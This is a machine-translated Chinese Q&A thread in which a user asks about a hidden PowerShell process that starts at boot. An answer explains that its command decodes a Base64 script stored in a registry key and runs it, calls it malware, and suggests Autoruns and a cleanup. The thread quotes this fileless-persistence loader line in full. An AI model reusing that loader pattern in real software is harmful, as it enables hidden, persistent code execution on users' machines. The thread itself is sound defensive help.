VoL*_*Bey 4 windows security windows-7 powershell malware
几天前我在任务管理器中注意到我有一个 powershell.exe 进程正在运行。当我去 msconfig 它有一个非常长的命令。这里是:
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.Get.String([Convert]::FromBase64string((gp'HKCU:\Software\Classes\SAJELFZIXHQTV').ADUXJH)));
这真的很奇怪,因为就在今天,我之前遇到过问题的一个随机进程出现了(也许它与此无关,只是说)这是一种病毒,并试图在我的 PC 上下载不安全的驱动程序,正如 Windows 所说的那样。谁能告诉我有关此 PowerShell 进程的信息?它在启动时启动并且一直在运行。再一次,我希望我没有听起来很无知,也许这只是一个正常的启动过程。
这几乎可以肯定是恶意的。
让我们把它拆开。它-noprofile在隐藏窗口 ( -windowstyle hidden) 中调用 Windows PowerShell(一种合法且非常有用的命令解释器),无需用户自定义( ),从而允许 PowerShell 会话运行脚本而不管系统策略 ( -executionpolicy bypass)。然后它运行这个命令:
iex ([Text.Encoding]::ASCII.Get.String([Convert]::FromBase64string((gp'HKCU:\Software\Classes\SAJELFZIXHQTV').ADUXJH)))
gp意味着Get-ItemProperty,它可用于检索注册表项的值,这就是它在这里所做的。显然,SAJELFZIXHQTV您当前的用户Software\Classes密钥中有一个密钥。该键有一个名为 的值ADUXJH,其中的数据是gp检索内容。该数据(显然是一个字符串)然后被Base64解码为一个字节数组 ( FromBase64String)。然后将这些字节解释为 ASCII 文本 ( ASCII.GetString)。奇怪的是,原始文件中有一个额外的点,这应该会导致错误,因为该ASCII对象没有名为Get. 不过,鉴于该过程仍然存在,我怀疑额外的点只是转录错误。
如果该错误不存在,则生成的文本将作为 PowerShell 命令 ( iex)调用。简而言之,此命令旨在从注册表加载编码脚本并执行它。要准确查看它正在运行的内容,请将上面的 PowerShell 命令减去iex和 并将多余的点删除到 PowerShell 提示符中并运行它。它将打印将被调用的命令。它几乎肯定不会是良性的。
您可以使用Autoruns工具阻止该条目自动启动。但是,对您的机器进行更深入的清洁可能是个好主意,因为它很可能已被感染。请参阅如何从我的 PC 中删除恶意间谍软件、恶意软件、广告软件、病毒、特洛伊木马或 rootkit?
| 归档时间: |
|
| 查看次数: |
1516 次 |
| 最近记录: |